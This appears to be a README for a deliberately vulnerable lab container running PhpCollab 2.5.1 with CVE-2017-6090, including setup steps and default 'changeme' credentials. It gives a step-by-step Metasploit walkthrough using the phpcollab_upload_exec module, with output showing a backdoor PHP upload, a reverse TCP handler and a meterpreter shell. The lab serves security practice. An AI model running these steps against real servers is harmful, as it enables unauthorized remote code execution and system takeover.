
Containerized exploitable PhpCollab

Apache License 2.0Apache-2.0

Containerized exploitable CVE-2017-6090

Docker Pulls License

This projects builds a container running PhpCollab 2.5.1, containing a remote code execution vulnerability as detailed in CVE-2017-6090. In addition, there is a docker-compse file to start that container and mysql to show the demo, and instructions to exploit are below.


docker build -t containername . or use the image jlkinsel/exploit-cve-2017-6090

Run & Configure

The easiest way to get this thing up is to use the enclosed docker-compose.yml file. If I get bored at some point - or folks show interest - I'll create a kubernetes deployment or helm chart.

So, to get things going:

docker-compose up

So far, so good! Now, phpcollab needs to be configured to use the database, and given a default admin password. I (briefly) tried automating this, but...well...you look like you know how to use a browser...

  • Browse to http://localhost:8088
  • Scroll to bottom of GPL, click the "Offline installation" box and then click Step 2
  • Enter the following data in fields, then click Save:
Field value
Database server mysql
Database login phpcollab
Database password changeme
Database name phpcollab
Notifications False
Admin password changeme (or whatever you want

Finally, you can log in and poke around, but not necessary for the exploit.


Notice this docker composition isn't doing anything fancy for storage. If you wish to persist the mysql database, you'll have to add a volume definition to the mysql service definition in docker-compose.yml. See examples on the mariadb docker hub page


First - follow Run & Configure above to get the application up and running.

I didn't add an exploit in this project, because, well, Metasploit.

New to MSF? Here's a quick overview of exploiting the container we just started:

docker run -ti --network exploitcve20176090_default remnux/metasploit

This takes a few minutes to spin things up. the remnux/metasploit docker hub page covers using volumes so this won't take as long in the future. But we're about now!

Once you get a shell prompt, let's continue:

# msfconsole
msf5 > use exploit/unix/webapp/phpcollab_upload_exec
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGET 0
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RHOST phpcollab
RHOST => phpcollab
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set RPORT 80
RPORT => 80
msf5 exploit(unix/webapp/phpcollab_upload_exec) > set TARGETURI /
msf5 exploit(unix/webapp/phpcollab_upload_exec) > exploit

[*] Started reverse TCP handler on
[*] Uploading backdoor file: 1.wGvfKLDyWHL.php
[+] Backdoor successfully created.
[*] Triggering the exploit...
[*] Sending stage (37543 bytes) to
[+] Deleted 1.wGvfKLDyWHL.php

meterpreter >

At this point, you're in, and the games can begin.


If the name of this directory is something other than "exploit-CVE-2017-6090" you'll have to change the --network command above.

Also - yes, we set the remote port to 80 in msfconsole, even through it's 8088 externally. The metasploit container is on the same network as the phpcollab container.